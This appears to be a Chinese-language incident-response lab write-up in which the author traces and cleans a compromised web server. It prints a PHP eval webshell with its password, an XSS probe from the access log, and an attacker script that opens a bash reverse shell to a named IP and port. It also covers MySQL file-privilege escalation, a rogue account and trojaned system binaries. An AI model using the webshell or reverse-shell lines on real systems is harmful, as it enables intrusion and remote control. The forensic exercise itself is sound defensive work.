您的服务器被黑客入侵了,您需要找到黑客留下的一些东西和修复被黑客破坏的文件
0x00 js劫持
访问WEB服务,在源代码发现了js劫持域名:
0x01 黑客首次webshell密码
我这里查找了全部的php文件:
find /var/www/html -name "*" |grep ".php"
在/var/www/html/public/Uploads/发现了可疑文件:
内容为:<?php @eval($_POST['QjsvWsp6L84Vl9dRTTytVyn5xNr1']);?>
0x02 黑客首次入侵方式
ps -ef,查看该WEB应用的中间件,为nginx。
访问/var/log/nginx/access.log发现最早攻击日志:
123.139.39.161 - - [26/Aug/2021:15:07:18 +0800] "POST /sale/api?type=reply HTTP/1.1" 200 90 goodid=57&content=%3Cscript%3Ealert(1)%3C%2Fscript%3E "http://39.106.16.18/sale/goods?id=57" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36" -
0x03 黑客服务器的信息
cat /var/www/html/runtime/cache/1.sh
#!/bin/bash
bash -i >& /dev/tcp/49.232.241.253/8888 0>&1
0x04 黑客的webshell2
访问/var/www/html/public/static/img/1.php
0x05 mysql
查看mysql的版本:
mysql> SELECT version();
+-------------------------+
| version() |
+-------------------------+
| 5.5.62-0ubuntu0.14.04.1 |
+-------------------------+
1 row in set (0.00 sec)
在网上高搜了一下mysql的提权方式总结,发现secure_file_priv没有受限:
mysql> show global variables like '%secure_file_priv%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_file_priv | |
+------------------+-------+
1 row in set (0.00 sec)
修改/etc/mysql/my.cnf将secure_file_priv的值设置为NULL,然后输入restart mysql重启该服务。
0x06 黑客的账号
cd /etc
cp shadow shadow-bak
vim shadow
删除aman账号
0x07 黑客篡改的命令1&2
命令一般存放在bin文件夹下,发现可疑的ls2和ps_
这里我手贱了删了所有的ls和ps,然后根据服务器的系统(ubuntu 14.04)下载了对应虚拟机,把虚拟机里的/bin/ls和/bin/ps上传到了靶机上,接着删掉了上面发现的所有🐎。
0x08 修复js劫持
删掉了/var/www/html/application/home/view/public/js.html中的可疑js。
